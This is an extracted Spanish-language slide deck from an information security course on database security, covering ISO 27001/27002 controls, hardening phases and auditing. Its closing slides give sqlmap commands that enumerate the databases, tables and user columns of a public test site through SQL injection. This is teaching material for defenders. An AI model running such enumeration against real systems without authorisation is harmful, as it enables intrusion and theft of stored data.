Académique Documents
Professionnel Documents
Culture Documents
bases de datos
Bases de Datos
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Tipos de bases de datos
• Relacional (RDBMS)
• Orientada a Objetos
(ODBMS)
• NoSQL
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Seguridad en bases de Datos
La gran mayoría de los datos
sensibles del mundo están
almacenados en sistemas
gestores de bases de datos
comerciales tales como Oracle,
Microsoft SQL Server entre
otros, y atacar una base de
datos es uno de los objetivos
favoritos para los criminales.
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
¿Cómo se gestiona una base de
datos?
• Un sistema de gestión de bases
de datos (DBMS) está formado
por un conjunto de programas
que se utilizan
para manejar grandes conjuntos
de datos estructurados con
funciones de
consulta especiales para
diferentes tipos de usuarios.
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Seguridad Informática
• Garantizar condiciones y características de
datos e información
– Confidencialidad
– Integridad
– Disponibilidad
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
ISO 27001-27002
•ISO/IEC 27001 – Estándar para el establecimiento,
implementación, control y mejora de un SGSI (sistema
de gestión de seguridad de la información), basado en
el British Standard BS 7799 Parte 2.
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Objetivos de Control – Controles de
Referencia ISO27002:2013
• 5 Políticas de la Seguridad de la
Información.
• 6.1.1 Roles y Responsabilidades
para la seguridad de la
información.
• 6.1.2 Separación de deberes.
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Objetivos de Control – Controles de
Referencia ISO27002:2013 (2)
• 9. Control de Acceso
• 9.2. Gestión de acceso de
usuarios.
– Registro de usuarios
– Gestión de derechos de acceso
– Retiro o ajuste de los derechos
de trabajo.
• 9.3 Responsabilidades de los
usuarios
– Uso Apropiado del acceso.
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Objetivos de Control – Controles de
Referencia ISO27002:2013 (3)
• 11. Seguridad Física
y del Entorno
– Perimetros de
Seguridad
– Control de acceso
fisico.
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Objetivos de Control – Controles de
Referencia ISO27002:2013 (4)
• 12 Seguridad en Operaciones
– Copias de Respaldo
– Registro y seguimiento
– Gestión de Vulnerabilidades técnicas
• 13 Seguridad de las comunicaciones
– Separación de redes.
– Transferencia de Información.
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Objetivos de Control – Controles de
Referencia ISO27002:2013 (5)
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Acciones a Emprender
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Asegurar la base de datos
• Fases
• Actividades
• Responsables
• Informes
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Primera Fase
• Implemente estrategias de copias de
seguridad y recuperación.
• Eliminar contraseñas por defecto
• Usar contraseñas complejas
• Ajustar los permisos de acceso al software
• Proteger los programas fuente
• Limitar los accesos de usuarios
administradores
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Segunda Fase
• Limitar accesos por sistema operativo
• Asignar cuotas de espacio
• Depurar los accesos de los usuarios
• Habilitar auditoria para cuentas de
administración
• Monitorear los accesos de administración
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Tercera Fase
• Eliminar contraseñas de archivos
• Crear perfiles para los usuarios de la base de
datos
• Bloquear objetos no usados
• Analizar los perfiles de los usuarios
• Análisis y Limpieza periódica de logs.
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Cuarta Fase
• Profundice la Auditoria
• Identifique información sensible
• Cifre la información sensible
• Cifre las copias de seguridad
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Algunas Vulnerabilidades en bases de
Datos
• https://cve.mitre.org/
• http://www.oracle.com
/technetwork/topics/se
curity/alerts-
086861.html
• https://technet.microso
ft.com/es-
es/security/bulletin/dn
602597.aspx
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Conceptos de Auditoria de Bases de
datos
• Es el proceso que
permite medir, asegurar,
demostrar, monitorear y
registrar los
accesos a la información
almacenada en las bases
de
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Que auditamos
• Quién accede a los datos
• Cuándo se accedió a los
datos
• Desde qué tipo de
dispositivo/aplicacióon
• Desde que ubicacioón en
la Red
• Cuál fue la sentencia SQL
ejecutada
• Cuál fue el efecto del
acceso
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Sql Inyection
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Sql Inyection (2)
• Identificar Bases de datos
– sqlmap -
u http://testphp.vulnweb.com/listproducts.php?cat=1 –
dbs
• Identificar tablas
– sqlmap -
u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart –tables
• Ver columnas
– sqlmap -
u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart -T users –columns
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Sql Inyection (3)
• Identificar Bases de datos
– sqlmap -
u http://testphp.vulnweb.com/listproducts.php?cat=1 –
dbs
• Identificar tablas
– sqlmap -
u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart –tables
• Ver columnas
– sqlmap -
u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart -T users –columns
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
Gracias!
Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright